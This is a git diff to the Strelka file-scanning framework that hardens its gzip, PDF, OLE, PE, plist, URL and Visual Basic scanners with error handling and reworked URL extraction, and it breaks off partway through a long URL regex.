diff --git a/configs/python/backend/backend.yaml b/configs/python/backend/backend.yaml
index 21035abe..57ebdc2c 100644
--- a/configs/python/backend/backend.yaml
+++ b/configs/python/backend/backend.yaml
@@ -211,7 +211,6 @@ scanners:
- 'html_file'
priority: 5
options:
- parser: "html5lib"
max_hyperlinks: 50
# 'ScanIni':
# - positive:
@@ -613,6 +612,7 @@ scanners:
flavors:
- 'vb_file'
- 'vbscript'
+ - 'hta_file'
priority: 5
'ScanVba':
- positive:
diff --git a/src/python/strelka/scanners/scan_gzip.py b/src/python/strelka/scanners/scan_gzip.py
index f9d2ef10..318a9364 100644
--- a/src/python/strelka/scanners/scan_gzip.py
+++ b/src/python/strelka/scanners/scan_gzip.py
@@ -1,5 +1,6 @@
import gzip
import io
+import zlib
from strelka import strelka
@@ -8,10 +9,17 @@ class ScanGzip(strelka.Scanner):
"""Decompresses gzip files."""
def scan(self, data, file, options, expire_at):
- with io.BytesIO(data) as gzip_io:
- with gzip.GzipFile(fileobj=gzip_io) as gzip_obj:
- decompressed = gzip_obj.read()
- self.event["size"] = len(decompressed)
+ try:
+ with io.BytesIO(data) as gzip_io:
+ with gzip.GzipFile(fileobj=gzip_io) as gzip_obj:
+ decompressed = gzip_obj.read()
+ self.event["size"] = len(decompressed)
- # Send extracted file back to Strelka
- self.emit_file(decompressed, name=file.name)
+ # Send extracted file back to Strelka
+ self.emit_file(decompressed, name=file.name)
+ except gzip.BadGzipFile:
+ self.flags.append("bad_gzip_file")
+ except zlib.error:
+ self.flags.append("bad_gzip_file")
+ except EOFError:
+ self.flags.append("eof_error")
diff --git a/src/python/strelka/scanners/scan_ocr.py b/src/python/strelka/scanners/scan_ocr.py
index d44f4c5d..c359b668 100644
--- a/src/python/strelka/scanners/scan_ocr.py
+++ b/src/python/strelka/scanners/scan_ocr.py
@@ -39,8 +39,10 @@ def scan(self, data, file, options, expire_at):
# Convert PDF to PNG if required.
if pdf_to_png and "application/pdf" in file.flavors.get("mime", []):
try:
- doc = fitz.open(stream=data, filetype="pdf")
- data = doc.get_page_pixmap(0).tobytes("png")
+ reader = fitz.open(stream=data, filetype="pdf")
+ if reader.is_encrypted:
+ return
+ data = reader.get_page_pixmap(0).tobytes("png")
except Exception as e:
self.flags.append(
f"{self.__class__.__name__}: image_pdf_error: {str(e)[:50]}"
diff --git a/src/python/strelka/scanners/scan_ole.py b/src/python/strelka/scanners/scan_ole.py
index 1f92491f..9af0c044 100644
--- a/src/python/strelka/scanners/scan_ole.py
+++ b/src/python/strelka/scanners/scan_ole.py
@@ -10,6 +10,7 @@ class ScanOle(strelka.Scanner):
"""Extracts files from OLECF files."""
def scan(self, data, file, options, expire_at):
+ ole = None
self.event["total"] = {"streams": 0, "extracted": 0}
try:
@@ -47,5 +48,5 @@ def scan(self, data, file, options, expire_at):
except OSError:
self.flags.append("os_error")
finally:
- # TODO this should be wrapped with another try / catch as the variable assignment is not guaranteed
- ole.close()
+ if ole:
+ ole.close()
diff --git a/src/python/strelka/scanners/scan_pdf.py b/src/python/strelka/scanners/scan_pdf.py
index d94a1567..f949a6d4 100644
--- a/src/python/strelka/scanners/scan_pdf.py
+++ b/src/python/strelka/scanners/scan_pdf.py
@@ -65,44 +65,48 @@ def scan(self, data, file, options, expire_at):
# Set maximum XREF objects to be collected (default: 250)
max_objects = options.get("max_objects", 250)
- # Set Default Variables
- self.event["images"] = 0
- self.event["lines"] = 0
- self.event["links"] = []
- self.event["words"] = 0
- self.event.setdefault("xref_object", list())
- keys = list()
-
try:
with io.BytesIO(data) as pdf_io:
reader = fitz.open(stream=pdf_io, filetype="pdf")
# Collect Metadata
+ self.event["dirty"] = reader.is_dirty
+ self.event["encrypted"] = reader.is_encrypted
+ self.event["language"] = reader.language
+ self.event["needs_pass"] = reader.needs_pass
+ self.event["old_xrefs"] = reader.has_old_style_xrefs
+ self.event["pages"] = reader.page_count
+ self.event["repaired"] = reader.is_repaired
+ self.event["xrefs"] = reader.xref_length() - 1
+
+ if reader.is_encrypted:
+ return
+
+ # Set Default Variables
+ self.event["images"] = 0
+ self.event["lines"] = 0
+ self.event["links"] = []
+ self.event["words"] = 0
+ self.event.setdefault("xref_object", list())
+ keys = list()
+
self.event["author"] = reader.metadata["author"]
self.event["creator"] = reader.metadata["creator"]
self.event["creation_date"] = self._convert_timestamp(
reader.metadata["creationDate"]
)
- self.event["dirty"] = reader.is_dirty
self.event["embedded_files"] = {
"count": reader.embfile_count(),
"names": reader.embfile_names(),
}
- self.event["encrypted"] = reader.is_encrypted
- self.event["needs_pass"] = reader.needs_pass
self.event["format"] = reader.metadata["format"]
self.event["keywords"] = reader.metadata["keywords"]
- self.event["language"] = reader.language
self.event["modify_date"] = self._convert_timestamp(
reader.metadata["modDate"]
)
- self.event["old_xrefs"] = reader.has_old_style_xrefs
- self.event["pages"] = reader.page_count
self.event["producer"] = reader.metadata["producer"]
- self.event["repaired"] = reader.is_repaired
self.event["subject"] = reader.metadata["subject"]
self.event["title"] = reader.metadata["title"]
- self.event["xrefs"] = reader.xref_length() - 1
# Collect Phones Numbers
phones = []
@@ -129,7 +133,9 @@ def scan(self, data, file, options, expire_at):
if pattern in xref_object:
keys.append(obj.lower())
# Extract urls from xref
- self.event["links"].extend(re.findall('"(https?://.*?)"', xref_object))
+ self.event["links"].extend(
+ re.findall(r"https?://[^\s)>]+", xref_object)
+ )
self.event["objects"] = dict(Counter(keys))
# Convert unique xref_object set back to list
@@ -173,12 +179,20 @@ def scan(self, data, file, options, expire_at):
self.event["words"] += len(
list(filter(None, page.get_text().split(" ")))
)
- # extract links
+ # Extract links
for link in page.get_links():
self.event["links"].append(link.get("uri"))
text += page.get_text()
+ # Extract urls from text
+ self.event["links"].extend(re.findall(r"https?://[^\s)>]+", text))
+
+ # If links found, remove all duplicates.
+ # Deduplicate the links
+ if self.event["links"]:
+ self.event["links"] = list(set(filter(None, self.event["links"])))
+
# Send extracted file back to Strelka
self.emit_file(text.encode("utf-8"), name="text")
diff --git a/src/python/strelka/scanners/scan_pe.py b/src/python/strelka/scanners/scan_pe.py
index 4e3a9a26..6d1cb443 100644
--- a/src/python/strelka/scanners/scan_pe.py
+++ b/src/python/strelka/scanners/scan_pe.py
@@ -397,15 +397,18 @@ def scan(self, data, file, options, expire_at):
except pefile.PEFormatError:
self.flags.append("pe_format_error")
return
+ except AttributeError:
+ self.flags.append("pe_attribute_error")
+ return
if rich_dict := parse_rich(pe):
- if not isinstance(rich_dict, str):
+ if type(rich_dict) is str:
self.event["rich"] = rich_dict
else:
self.flags.append(rich_dict)
if cert_dict := parse_certificates(data):
- if not isinstance(cert_dict, str):
+ if type(cert_dict) is str:
self.event["security"] = cert_dict
else:
self.flags.append(cert_dict)
@@ -455,30 +458,33 @@ def scan(self, data, file, options, expire_at):
# https://github.com/erocarrera/pefile/blob/master/pefile.py#L3553
if hasattr(pe, "FileInfo"):
- fi = pe.FileInfo[0] # contains a single element
- for i in fi:
- if i.Key == b"StringFileInfo":
- for st in i.StringTable:
- for k, v in st.entries.items():
- if k.decode() in COMMON_FILE_INFO_NAMES:
- self.event["file_info"][
- COMMON_FILE_INFO_NAMES[k.decode()]
- ] = v.decode()
- else:
- self.event["file_info"]["string"].append(
- {
- "name": k.decode(),
- "value": v.decode(),
- }
- )
- elif i.Key == b"VarFileInfo":
- for v in i.Var:
- if translation := v.entry.get(b"Translation"):
- (lang, char) = translation.split()
- self.event["file_info"]["var"] = {
- "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)),
- "character_set": VAR_FILE_INFO_CHARS.get(int(char, 16)),
- }
+ if pe.FileInfo:
+ fi = pe.FileInfo[0] # contains a single element
+ for i in fi:
+ if i.Key == b"StringFileInfo":
+ for st in i.StringTable:
+ for k, v in st.entries.items():
+ if k.decode() in COMMON_FILE_INFO_NAMES:
+ self.event["file_info"][
+ COMMON_FILE_INFO_NAMES[k.decode()]
+ ] = v.decode()
+ else:
+ self.event["file_info"]["string"].append(
+ {
+ "name": k.decode(),
+ "value": v.decode(),
+ }
+ )
+ elif i.Key == b"VarFileInfo":
+ for v in i.Var:
+ if translation := v.entry.get(b"Translation"):
+ (lang, char) = translation.split()
+ self.event["file_info"]["var"] = {
+ "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)),
+ "character_set": VAR_FILE_INFO_CHARS.get(
+ int(char, 16)
+ ),
+ }
if hasattr(pe, "VS_FIXEDFILEINFO"):
vs_ffi = pe.VS_FIXEDFILEINFO[0] # contains a single element
@@ -509,7 +515,7 @@ def scan(self, data, file, options, expire_at):
self.event["header"] = {
"machine": {
"id": pe.FILE_HEADER.Machine,
- "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine).replace(
+ "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine, "").replace(
"IMAGE_FILE_MACHINE_", ""
),
},
@@ -518,7 +524,7 @@ def scan(self, data, file, options, expire_at):
"image": MAGIC_IMAGE.get(pe.OPTIONAL_HEADER.Magic, ""),
},
"subsystem": pefile.SUBSYSTEM_TYPE.get(
- pe.OPTIONAL_HEADER.Subsystem
+ pe.OPTIONAL_HEADER.Subsystem, ""
).replace("IMAGE_SUBSYSTEM_", ""),
}
@@ -600,43 +606,48 @@ def scan(self, data, file, options, expire_at):
resource_sha256_set = set()
for res0 in pe.DIRECTORY_ENTRY_RESOURCE.entries:
- for res1 in res0.directory.entries:
- for res2 in res1.directory.entries:
- lang = res2.data.lang
- sub = res2.data.sublang
- sub = pefile.get_sublang_name_for_lang(lang, sub)
- data = pe.get_data(
- res2.data.struct.OffsetToData, res2.data.struct.Size
- )
-
- resource_md5 = hashlib.md5(data).hexdigest()
- resource_sha1 = hashlib.sha1(data).hexdigest()
- resource_sha256 = hashlib.sha256(data).hexdigest()
-
- resource_md5_set.add(resource_md5)
- resource_sha1_set.add(resource_sha1)
- resource_sha256_set.add(resource_sha256)
-
- resource_dict = {
- "id": res1.id,
- "language": {"sub": sub.replace("SUBLANG_", "")},
- "type": pefile.RESOURCE_TYPE.get(res0.id, "").replace(
- "RT_", ""
- ),
- "md5": resource_md5,
- "sha1": resource_sha1,
- "sha256": resource_sha256,
- }
-
- if lang in pefile.LANG:
- resource_dict["language"]["primary"] = pefile.LANG[
- lang
- ].replace("LANG_", "")
-
- if res1.name:
- resource_dict["name"] = str(res1.name)
-
- self.event["resources"].append(resource_dict)
+ if hasattr(res0, "directory"):
+ for res1 in res0.directory.entries:
+ if hasattr(res1, "directory"):
+ for res2 in res1.directory.entries:
+ lang = res2.data.lang
+ sub = res2.data.sublang
+ sub = pefile.get_sublang_name_for_lang(lang, sub)
+ try:
+ data = pe.get_data(
+ res2.data.struct.OffsetToData,
+ res2.data.struct.Size,
+ )
+ except pefile.PEFormatError:
+ continue
+ resource_md5 = hashlib.md5(data).hexdigest()
+ resource_sha1 = hashlib.sha1(data).hexdigest()
+ resource_sha256 = hashlib.sha256(data).hexdigest()
+
+ resource_md5_set.add(resource_md5)
+ resource_sha1_set.add(resource_sha1)
+ resource_sha256_set.add(resource_sha256)
+
+ resource_dict = {
+ "id": res1.id,
+ "language": {"sub": sub.replace("SUBLANG_", "")},
+ "type": pefile.RESOURCE_TYPE.get(
+ res0.id, ""
+ ).replace("RT_", ""),
+ "md5": resource_md5,
+ "sha1": resource_sha1,
+ "sha256": resource_sha256,
+ }
+
+ if lang in pefile.LANG:
+ resource_dict["language"]["primary"] = pefile.LANG[
+ lang
+ ].replace("LANG_", "")
+
+ if res1.name:
+ resource_dict["name"] = str(res1.name)
+
+ self.event["resources"].append(resource_dict)
# TODO: Add optional resource extraction
diff --git a/src/python/strelka/scanners/scan_plist.py b/src/python/strelka/scanners/scan_plist.py
index 61c82701..08e19a0d 100644
--- a/src/python/strelka/scanners/scan_plist.py
+++ b/src/python/strelka/scanners/scan_plist.py
@@ -20,20 +20,21 @@ def scan(self, data, file, options, expire_at):
plist = plistlib.loads(data)
self.event["keys"] = []
- for k, v in plist.items():
- if keys and k not in keys:
- continue
-
- try:
- v = ast.literal_eval(v)
- except (ValueError, SyntaxError):
- pass
-
- self.event["keys"].append(
- {
- "key": k,
- "value": v,
- }
- )
+ if isinstance(plist, dict):
+ for k, v in plist.items():
+ if keys and k not in keys:
+ continue
+
+ try:
+ v = ast.literal_eval(v)
+ except (ValueError, SyntaxError):
+ pass
+
+ self.event["keys"].append(
+ {
+ "key": k,
+ "value": v,
+ }
+ )
except xml.parsers.expat.ExpatError:
self.flags.append("invalid_format")
diff --git a/src/python/strelka/scanners/scan_url.py b/src/python/strelka/scanners/scan_url.py
index 1e05784a..599d1940 100644
--- a/src/python/strelka/scanners/scan_url.py
+++ b/src/python/strelka/scanners/scan_url.py
@@ -24,6 +24,8 @@ class ScanUrl(strelka.Scanner):
"""
def init(self):
+ # Default compiled regex pattern for URL extraction.
+ # This default pattern aims to match a wide range of URLs including those with TLDs.
self.regexes = {
"default": re.compile(
rb'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))'
@@ -31,19 +33,28 @@ def init(self):
}
def scan(self, data, file, options, expire_at):
- regex = options.get("regex", False)
- if regex:
- ((key, value),) = regex.items()
- if key not in self.regexes:
- self.regexes[key] = re.compile(value.encode())
- url_regex = self.regexes[key]
- else:
- url_regex = self.regexes["default"]
-
- normalized_data = b" ".join(data.split())
- self.event.setdefault("urls", [])
- urls = url_regex.findall(normalized_data)
- for url in urls:
- url = url.strip(b"!\"#$%&'()*+,-./@:;<=>[\\]^_`{|}~")
- if url not in self.event["urls"]:
- self.event["urls"].append(url)
+ try:
+ # Obtain regex pattern from options or use the default one.
+ regex_key = options.get("regex", "default")
+ if regex_key not in self.regexes and regex_key in options:
+ # Compile and store the custom regex if provided and not already compiled.
+ self.regexes[regex_key] = re.compile(options[regex_key].encode())
+
+ url_regex = self.regexes[regex_key]
+
+ # Normalize data: replace multiple whitespace characters with a single space.
+ normalized_data = re.sub(rb"\s+", b" ", data)
+
+ # Initialize 'urls' event list to store extracted URLs.
+ self.event.setdefault("urls", [])
+
+ # Find all URLs using the regex pattern.
+ urls = set(url_regex.findall(normalized_data))
+ for url in urls:
+ # Strip leading and trailing punctuation characters from the URL.
+ clean_url = url.strip(b"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~").decode()
+ if clean_url not in self.event["urls"]:
+ self.event["urls"].append(clean_url)
+
+ except Exception as e:
+ self.flags.append(f"scanner_error: {e}")
diff --git a/src/python/strelka/scanners/scan_vb.py b/src/python/strelka/scanners/scan_vb.py
index dfcd654b..8fd51674 100644
--- a/src/python/strelka/scanners/scan_vb.py
+++ b/src/python/strelka/scanners/scan_vb.py
@@ -1,3 +1,5 @@
+import re
+
import pygments
from pygments import formatters, lexers
@@ -5,58 +7,143 @@
class ScanVb(strelka.Scanner):
- """Collects metadata from Visual Basic script files.
+ """
+ Scanner for Visual Basic (VB) script files.
+
+ This scanner parses VB script files to extract various components like comments,
+ function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to
+ tokenize the script data and then extracts useful information from these tokens.
Attributes:
- lexer: Pygments lexer ('vbnet') used to parse the file.
+ lexer: A Pygments lexer object for tokenizing VB.NET scripts.
+ url_regex: A compiled regex pattern for extracting URLs from the script.
"""
def init(self):
+ # Initialize the lexer for VB.NET language using Pygments
self.lexer = lexers.get_lexer_by_name("vbnet")
- def scan(self, data, file, options, expire_at):
- highlight = pygments.highlight(
- data,
- self.lexer,
- formatters.RawTokenFormatter(),
+ # Regular expression to capture URLs, considering various schemes and TLDs.
+ self.url_regex = re.compile(
+ r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|be